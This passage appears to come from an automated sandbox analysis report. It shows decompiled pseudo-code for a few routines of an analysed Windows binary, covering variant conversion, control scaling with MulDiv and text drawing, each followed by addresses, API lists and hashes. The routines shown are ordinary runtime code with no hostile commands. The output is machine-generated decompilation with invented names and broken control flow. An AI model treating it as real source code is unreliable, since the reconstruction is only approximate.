					if( *((intOrPtr*)( *_v24 + 8))() == 0) {
						_t207 =  *_v12;
						if((_t207 & 0x00000fff) >= 0x10f) {
							if(E0041713C(_t207,  &_v28) != 0) {
								_push( &_v18);
								_t217 = _v16;
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_t119 = E0041024C(_t217);
									goto L40;
								} else {
									if( *_v8 == _v18) {
										_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
										goto L40;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t271);
										_push(0x415779);
										_push( *[fs:eax]);
										 *[fs:eax] = _t274;
										_t219 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, _t269, _t278);
										E00410E14(_v8,  &_v44);
										if( *_v8 != _v18) {
											E0041015C(_t219);
										}
										_pop(_t250);
										 *[fs:eax] = _t250;
										_push(0x415780);
										return E004109E8( &_v44);
									}
								}
							} else {
								_t119 = E0041024C(_t216);
								goto L40;
							}
						} else {
							if(_t207 ==  *_v8) {
								_t119 = E004161B0(_v8, _v16, _v12);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x4156ca);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t224 =  *_v12 & 0x0000ffff;
								E00411330( &_v44,  *_v12 & 0x0000ffff, _v8, _t269, _t278);
								E00410E14(_v8,  &_v44);
								if( *_v8 !=  *_v12) {
									E0041015C(_t224);
								}
								_pop(_t255);
								 *[fs:eax] = _t255;
								_push(0x4156d1);
								return E004109E8( &_v44);
							}
						}
					} else {
						if( *_v12 == _v20) {
							_t119 =  *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							goto L40;
						} else {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41562f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t228 = _v20 & 0x0000ffff;
							E00411330( &_v44, _v20 & 0x0000ffff, _v12, _t269, _t278);
							if(_v44 != _v20) {
								E0041015C(_t228);
							}
							 *((intOrPtr*)( *_v24 + 0x2c))(_v16);
							_pop(_t259);
							 *[fs:eax] = _t259;
							_push(0x415799);
							return E004109E8( &_v44);
						}
					}
				} else {
					if(E0041713C( *_v12,  &_v28) != 0) {
						_push( &_v18);
						if( *((intOrPtr*)( *_v28 + 4))() == 0) {
							_push( &_v44);
							L0040F318();
							_push(_t271);
							_push(0x41558f);
							_push( *[fs:eax]);
							 *[fs:eax] = _t274;
							_t234 =  *_v8 & 0x0000ffff;
							E00411330( &_v44,  *_v8 & 0x0000ffff, _v12, __edi, __fp0);
							if( *_v8 != _v44) {
								E0041015C(_t234);
							}
							E004161B0(_v8, _v16,  &_v44);
							_pop(_t264);
							 *[fs:eax] = _t264;
							_push(0x415799);
							return E004109E8( &_v44);
						} else {
							if( *_v8 == _v18) {
								_t119 =  *((intOrPtr*)( *_v28 + 0x2c))(_v16);
								goto L40;
							} else {
								_push( &_v44);
								L0040F318();
								_push(_t271);
								_push(0x415514);
								_push( *[fs:eax]);
								 *[fs:eax] = _t274;
								_t239 = _v18 & 0x0000ffff;
								E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
								E00410E14(_v8,  &_v44);
								if( *_v8 != _v18) {
									E0041015C(_t239);
								}
								_pop(_t268);
								 *[fs:eax] = _t268;
								_push(0x41551b);
								return E004109E8( &_v44);
							}
						}
					} else {
						_t119 = E0041024C(__ecx);
						L40:
						return _t119;
					}
				}
			}
























                                                                                                                                                                                                                            0x00415454
                                                                                                                                                                                                                            0x00415454
                                                                                                                                                                                                                            0x00415455
                                                                                                                                                                                                                            0x00415457
                                                                                                                                                                                                                            0x0041545b
                                                                                                                                                                                                                            0x0041545e
                                                                                                                                                                                                                            0x00415461
                                                                                                                                                                                                                            0x00415467
                                                                                                                                                                                                                            0x00415474
                                                                                                                                                                                                                            0x004155a5
                                                                                                                                                                                                                            0x004155a7
                                                                                                                                                                                                                            0x004155a7
                                                                                                                                                                                                                            0x004155af
                                                                                                                                                                                                                            0x004155b3
                                                                                                                                                                                                                            0x004155c0
                                                                                                                                                                                                                            0x00415650
                                                                                                                                                                                                                            0x0041565d
                                                                                                                                                                                                                            0x004156f3
                                                                                                                                                                                                                            0x00415702
                                                                                                                                                                                                                            0x00415706
                                                                                                                                                                                                                            0x00415713
                                                                                                                                                                                                                            0x00415794
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00415715
                                                                                                                                                                                                                            0x0041571f
                                                                                                                                                                                                                            0x0041578f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00415721
                                                                                                                                                                                                                            0x00415724
                                                                                                                                                                                                                            0x00415725
                                                                                                                                                                                                                            0x0041572c
                                                                                                                                                                                                                            0x0041572d
                                                                                                                                                                                                                            0x00415732
                                                                                                                                                                                                                            0x00415735
                                                                                                                                                                                                                            0x00415738
                                                                                                                                                                                                                            0x00415742
                                                                                                                                                                                                                            0x0041574d
                                                                                                                                                                                                                            0x0041575c
                                                                                                                                                                                                                            0x0041575e
                                                                                                                                                                                                                            0x0041575e
                                                                                                                                                                                                                            0x00415765
                                                                                                                                                                                                                            0x00415768
                                                                                                                                                                                                                            0x0041576b
                                                                                                                                                                                                                            0x00415778
                                                                                                                                                                                                                            0x00415778
                                                                                                                                                                                                                            0x0041571f
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004156f5
                                                                                                                                                                                                                            0x00415663
                                                                                                                                                                                                                            0x0041566c
                                                                                                                                                                                                                            0x004156da
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041566e
                                                                                                                                                                                                                            0x00415671
                                                                                                                                                                                                                            0x00415672
                                                                                                                                                                                                                            0x00415679
                                                                                                                                                                                                                            0x0041567a
                                                                                                                                                                                                                            0x0041567f
                                                                                                                                                                                                                            0x00415682
                                                                                                                                                                                                                            0x00415688
                                                                                                                                                                                                                            0x00415691
                                                                                                                                                                                                                            0x0041569c
                                                                                                                                                                                                                            0x004156ad
                                                                                                                                                                                                                            0x004156af
                                                                                                                                                                                                                            0x004156af
                                                                                                                                                                                                                            0x004156b6
                                                                                                                                                                                                                            0x004156b9
                                                                                                                                                                                                                            0x004156bc
                                                                                                                                                                                                                            0x004156c9
                                                                                                                                                                                                                            0x004156c9
                                                                                                                                                                                                                            0x0041566c
                                                                                                                                                                                                                            0x004155c6
                                                                                                                                                                                                                            0x004155d0
                                                                                                                                                                                                                            0x00415645
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004155d2
                                                                                                                                                                                                                            0x004155d5
                                                                                                                                                                                                                            0x004155d6
                                                                                                                                                                                                                            0x004155dd
                                                                                                                                                                                                                            0x004155de
                                                                                                                                                                                                                            0x004155e3
                                                                                                                                                                                                                            0x004155e6
                                                                                                                                                                                                                            0x004155e9
                                                                                                                                                                                                                            0x004155f3
                                                                                                                                                                                                                            0x00415600
                                                                                                                                                                                                                            0x00415602
                                                                                                                                                                                                                            0x00415602
                                                                                                                                                                                                                            0x00415616
                                                                                                                                                                                                                            0x0041561b
                                                                                                                                                                                                                            0x0041561e
                                                                                                                                                                                                                            0x00415621
                                                                                                                                                                                                                            0x0041562e
                                                                                                                                                                                                                            0x0041562e
                                                                                                                                                                                                                            0x004155d0
                                                                                                                                                                                                                            0x0041547a
                                                                                                                                                                                                                            0x0041548a
                                                                                                                                                                                                                            0x00415499
                                                                                                                                                                                                                            0x004154aa
                                                                                                                                                                                                                            0x00415535
                                                                                                                                                                                                                            0x00415536
                                                                                                                                                                                                                            0x0041553d
                                                                                                                                                                                                                            0x0041553e
                                                                                                                                                                                                                            0x00415543
                                                                                                                                                                                                                            0x00415546
                                                                                                                                                                                                                            0x0041554c
                                                                                                                                                                                                                            0x00415555
                                                                                                                                                                                                                            0x00415564
                                                                                                                                                                                                                            0x00415566
                                                                                                                                                                                                                            0x00415566
                                                                                                                                                                                                                            0x00415574
                                                                                                                                                                                                                            0x0041557b
                                                                                                                                                                                                                            0x0041557e
                                                                                                                                                                                                                            0x00415581
                                                                                                                                                                                                                            0x0041558e
                                                                                                                                                                                                                            0x004154b0
                                                                                                                                                                                                                            0x004154ba
                                                                                                                                                                                                                            0x0041552a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004154bc
                                                                                                                                                                                                                            0x004154bf
                                                                                                                                                                                                                            0x004154c0
                                                                                                                                                                                                                            0x004154c7
                                                                                                                                                                                                                            0x004154c8
                                                                                                                                                                                                                            0x004154cd
                                                                                                                                                                                                                            0x004154d0
                                                                                                                                                                                                                            0x004154d3
                                                                                                                                                                                                                            0x004154dd
                                                                                                                                                                                                                            0x004154e8
                                                                                                                                                                                                                            0x004154f7
                                                                                                                                                                                                                            0x004154f9
                                                                                                                                                                                                                            0x004154f9
                                                                                                                                                                                                                            0x00415500
                                                                                                                                                                                                                            0x00415503
                                                                                                                                                                                                                            0x00415506
                                                                                                                                                                                                                            0x00415513
                                                                                                                                                                                                                            0x00415513
                                                                                                                                                                                                                            0x004154ba
                                                                                                                                                                                                                            0x0041548c
                                                                                                                                                                                                                            0x0041548c
                                                                                                                                                                                                                            0x00415799
                                                                                                                                                                                                                            0x0041579d
                                                                                                                                                                                                                            0x0041579d
                                                                                                                                                                                                                            0x0041548a

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004154C0
                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004155D6
                                                                                                                                                                                                                              • Part of subcall function 0041713C: RtlEnterCriticalSection.KERNEL32(0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06,?,?,?,?,?,004101DF,00000000), ref: 00417172
                                                                                                                                                                                                                              • Part of subcall function 0041713C: RtlLeaveCriticalSection.KERNEL32(0049E828,004171EB,?,0049E828,?,?,?,00000000,?,00416D60,00000000,00416E06), ref: 004171DE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CriticalInitSectionVariant$EnterLeave
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2777075435-0
                                                                                                                                                                                                                            • Opcode ID: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                                                                                                                                                                                            • Instruction ID: a24615229599b446cf83ad5ef8fc14772df329521493faa61475ffe7701a7f51
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 911dfcfbc7a12d5b52f32f0e07c108f6710307d6a7d9ba3bae60d823c04f13e4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D8B16D79A00609EFDB00EF94C5818EDB7B5FF89714F9040A6E804A7751D738AEC5CB68
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004534EC Relevance: 7.7, APIs: 5, Instructions: 171COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E004534EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				signed char _t92;
				int _t98;
				int _t100;
				intOrPtr _t117;
				int _t122;
				intOrPtr _t155;
				void* _t164;
				signed char _t180;
				intOrPtr _t182;
				intOrPtr _t194;
				int _t199;
				intOrPtr _t203;
				void* _t204;

				_t204 = __eflags;
				_t196 = __edi;
				_t202 = _t203;
				_v8 = __eax;
				E0043DF9C(_v8);
				_push(_t203);
				_push(0x453742);
				_push( *[fs:edx]);
				 *[fs:edx] = _t203;
				 *(_v8 + 0x268) = 0;
				 *(_v8 + 0x26c) = 0;
				 *(_v8 + 0x270) = 0;
				_t164 = 0;
				_t92 =  *0x49e665; // 0x0
				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
				E0043D6F8(_v8, 0, __edx, _t204);
				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
					L12:
					_t98 =  *(_v8 + 0x268);
					_t213 = _t98;
					if(_t98 > 0) {
						E0043A998(_v8, _t98, _t196, _t213);
					}
					_t100 =  *(_v8 + 0x26c);
					_t214 = _t100;
					if(_t100 > 0) {
						E0043A9DC(_v8, _t100, _t196, _t214);
					}
					_t180 =  *0x453750; // 0x0
					 *(_v8 + 0x98) = _t180;
					_t215 = _t164;
					if(_t164 == 0) {
						E00452B4C(_v8, 1, 1);
						E004411C8(_v8, 1, 1, _t215);
					}
					E0043C130(_v8, 0, 0xb03d, 0);
					_pop(_t182);
					 *[fs:eax] = _t182;
					_push(0x453749);
					return E0043DFA4(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t194 =  *0x49ebbc; // 0x0
						if( *(_v8 + 0x25c) !=  *((intOrPtr*)(_t194 + 0x40))) {
							_t155 =  *0x49ebbc; // 0x0
							E00424FF8( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00424FF0( *((intOrPtr*)(_v8 + 0x68))),  *(_t155 + 0x40),  *(_v8 + 0x25c)), __edi, _t202);
						}
					}
					_t117 =  *0x49ebbc; // 0x0
					 *(_v8 + 0x25c) =  *(_t117 + 0x40);
					_t199 = E00453874(_v8);
					_t122 =  *(_v8 + 0x270);
					_t209 = _t199 - _t122;
					if(_t199 != _t122) {
						_t164 = 1;
						E00452B4C(_v8, _t122, _t199);
						E004411C8(_v8,  *(_v8 + 0x270), _t199, _t209);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
						}
					}
					goto L12;
				}
			}

















                                                                                                                                                                                                                            0x004534ec
                                                                                                                                                                                                                            0x004534ec
                                                                                                                                                                                                                            0x004534ed
                                                                                                                                                                                                                            0x004534f4
                                                                                                                                                                                                                            0x004534fa
                                                                                                                                                                                                                            0x00453501
                                                                                                                                                                                                                            0x00453502
                                                                                                                                                                                                                            0x00453507
                                                                                                                                                                                                                            0x0045350a
                                                                                                                                                                                                                            0x00453512
                                                                                                                                                                                                                            0x0045351d
                                                                                                                                                                                                                            0x00453528
                                                                                                                                                                                                                            0x0045352e
                                                                                                                                                                                                                            0x00453530
                                                                                                                                                                                                                            0x0045353a
                                                                                                                                                                                                                            0x00453545
                                                                                                                                                                                                                            0x00453554
                                                                                                                                                                                                                            0x004536b6
                                                                                                                                                                                                                            0x004536b9
                                                                                                                                                                                                                            0x004536bf
                                                                                                                                                                                                                            0x004536c1
                                                                                                                                                                                                                            0x004536c8
                                                                                                                                                                                                                            0x004536c8
                                                                                                                                                                                                                            0x004536d0
                                                                                                                                                                                                                            0x004536d6
                                                                                                                                                                                                                            0x004536d8
                                                                                                                                                                                                                            0x004536df
                                                                                                                                                                                                                            0x004536df
                                                                                                                                                                                                                            0x004536e7
                                                                                                                                                                                                                            0x004536ed
                                                                                                                                                                                                                            0x004536f3
                                                                                                                                                                                                                            0x004536f5
                                                                                                                                                                                                                            0x00453704
                                                                                                                                                                                                                            0x00453716
                                                                                                                                                                                                                            0x00453716
                                                                                                                                                                                                                            0x00453727
                                                                                                                                                                                                                            0x0045372e
                                                                                                                                                                                                                            0x00453731
                                                                                                                                                                                                                            0x00453734
                                                                                                                                                                                                                            0x00453741
                                                                                                                                                                                                                            0x0045356a
                                                                                                                                                                                                                            0x00453574
                                                                                                                                                                                                                            0x0045357f
                                                                                                                                                                                                                            0x00453588
                                                                                                                                                                                                                            0x00453594
                                                                                                                                                                                                                            0x004535b4
                                                                                                                                                                                                                            0x004535b4
                                                                                                                                                                                                                            0x00453588
                                                                                                                                                                                                                            0x004535b9
                                                                                                                                                                                                                            0x004535c4
                                                                                                                                                                                                                            0x004535d2
                                                                                                                                                                                                                            0x004535d7
                                                                                                                                                                                                                            0x004535dd
                                                                                                                                                                                                                            0x004535df
                                                                                                                                                                                                                            0x004535e5
                                                                                                                                                                                                                            0x004535ee
                                                                                                                                                                                                                            0x00453601
                                                                                                                                                                                                                            0x00453610
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045362f
                                                                                                                                                                                                                            0x0045363f
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045365e
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x0045368d
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x004536b0
                                                                                                                                                                                                                            0x0045366e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004535df

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,?,00000000), ref: 004535AB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453627
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453656
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 00453685
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,00000000,00000000), ref: 004536A8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction ID: c7ec2d223f710dc91b05457c805857c5415938e4303d673742531becb7789678
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf453c4939c3507c7547244688a5841333b77e73213c39d2921ddabae2898744
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9171F670A04104EFCB04DFA9C589EADB3F5AF48305F2941FAE808DB362D775AE459B44
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044AF00 Relevance: 7.7, APIs: 5, Instructions: 162COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 85%
                                                                                                                                                                                                                            			E0044AF00(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44b0e4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044CE98(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044E4D4(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E00404A58( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E00404DCC(_v16, 0x44b108);
					if(_t153 != 0) {
						E004256F8( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c;
							E004250DC( *((intOrPtr*)(_v8 + 0xc)), E004250D0( *((intOrPtr*)(_v8 + 0xc))) |  *0x44b10c, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E00404C80(_v16);
							_t65 = E00404E80(_v16);
							DrawTextA(E00425C68(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x44b0eb);
							return E004049C0( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
								_t89 = E00404C80(_v16);
								_t91 = E00404E80(_v16);
								DrawTextA(E00425C68(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
							} else {
								_t76 = E00424950(0xff00000d);
								_t78 = E00424950(0xff000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E00424E10( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00425C68(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E00404C88( &_v16, 0x44b0fc);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}



















                                                                                                                                                                                                                            0x0044af00
                                                                                                                                                                                                                            0x0044af01
                                                                                                                                                                                                                            0x0044af0b
                                                                                                                                                                                                                            0x0044af0e
                                                                                                                                                                                                                            0x0044af11
                                                                                                                                                                                                                            0x0044af14
                                                                                                                                                                                                                            0x0044af16
                                                                                                                                                                                                                            0x0044af1b
                                                                                                                                                                                                                            0x0044af1c
                                                                                                                                                                                                                            0x0044af21
                                                                                                                                                                                                                            0x0044af24
                                                                                                                                                                                                                            0x0044af29
                                                                                                                                                                                                                            0x0044af2e
                                                                                                                                                                                                                            0x0044af32
                                                                                                                                                                                                                            0x0044af42
                                                                                                                                                                                                                            0x0044af51
                                                                                                                                                                                                                            0x0044af54
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af59
                                                                                                                                                                                                                            0x0044af44
                                                                                                                                                                                                                            0x0044af47
                                                                                                                                                                                                                            0x0044af47
                                                                                                                                                                                                                            0x0044af5c
                                                                                                                                                                                                                            0x0044af5c
                                                                                                                                                                                                                            0x0044af68
                                                                                                                                                                                                                            0x0044af70
                                                                                                                                                                                                                            0x0044af96
                                                                                                                                                                                                                            0x0044af9e
                                                                                                                                                                                                                            0x0044afa3
                                                                                                                                                                                                                            0x0044afe1
                                                                                                                                                                                                                            0x0044afe6
                                                                                                                                                                                                                            0x0044afea
                                                                                                                                                                                                                            0x0044afef
                                                                                                                                                                                                                            0x0044affb
                                                                                                                                                                                                                            0x0044b003
                                                                                                                                                                                                                            0x0044b003
                                                                                                                                                                                                                            0x0044b008
                                                                                                                                                                                                                            0x0044b00c
                                                                                                                                                                                                                            0x0044b0a9
                                                                                                                                                                                                                            0x0044b0b1
                                                                                                                                                                                                                            0x0044b0ba
                                                                                                                                                                                                                            0x0044b0c9
                                                                                                                                                                                                                            0x0044b0ce
                                                                                                                                                                                                                            0x0044b0d0
                                                                                                                                                                                                                            0x0044b0d3
                                                                                                                                                                                                                            0x0044b0d6
                                                                                                                                                                                                                            0x0044b0e3
                                                                                                                                                                                                                            0x0044b012
                                                                                                                                                                                                                            0x0044b012
                                                                                                                                                                                                                            0x0044b016
                                                                                                                                                                                                                            0x0044b020
                                                                                                                                                                                                                            0x0044b030
                                                                                                                                                                                                                            0x0044b03d
                                                                                                                                                                                                                            0x0044b046
                                                                                                                                                                                                                            0x0044b055
                                                                                                                                                                                                                            0x0044b062
                                                                                                                                                                                                                            0x0044b062
                                                                                                                                                                                                                            0x0044b067
                                                                                                                                                                                                                            0x0044b06b
                                                                                                                                                                                                                            0x0044b099
                                                                                                                                                                                                                            0x0044b0a4
                                                                                                                                                                                                                            0x0044b06d
                                                                                                                                                                                                                            0x0044b072
                                                                                                                                                                                                                            0x0044b07e
                                                                                                                                                                                                                            0x0044b083
                                                                                                                                                                                                                            0x0044b085
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044b092
                                                                                                                                                                                                                            0x0044b092
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044b06b
                                                                                                                                                                                                                            0x0044b00c
                                                                                                                                                                                                                            0x0044afa8
                                                                                                                                                                                                                            0x0044afb6
                                                                                                                                                                                                                            0x0044afb7
                                                                                                                                                                                                                            0x0044afb8
                                                                                                                                                                                                                            0x0044afb9
                                                                                                                                                                                                                            0x0044afba
                                                                                                                                                                                                                            0x0044afcf
                                                                                                                                                                                                                            0x0044afcf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af72
                                                                                                                                                                                                                            0x0044af76
                                                                                                                                                                                                                            0x0044af89
                                                                                                                                                                                                                            0x0044af91
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af91
                                                                                                                                                                                                                            0x0044af7e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af83
                                                                                                                                                                                                                            0x0044af87
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044af87

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 0044AFCF
                                                                                                                                                                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044B020
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B055
                                                                                                                                                                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044B062
                                                                                                                                                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0044B0C9
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Draw$OffsetRectText$Edge
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3610532707-0
                                                                                                                                                                                                                            • Opcode ID: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                                                                                                                                                                                            • Instruction ID: ea5abe3bfc9a9df89051e6d8e73c4225462b89b626b3e2b5561302bed16b813c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 18493c12ef401e963272a7311625c849f2c9f643628862a87cd9f04e99074c40
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C551A3B0A04204AFEB10EBA9D881B9F73E5EF44324F55856BF924A7381C73CED048B59
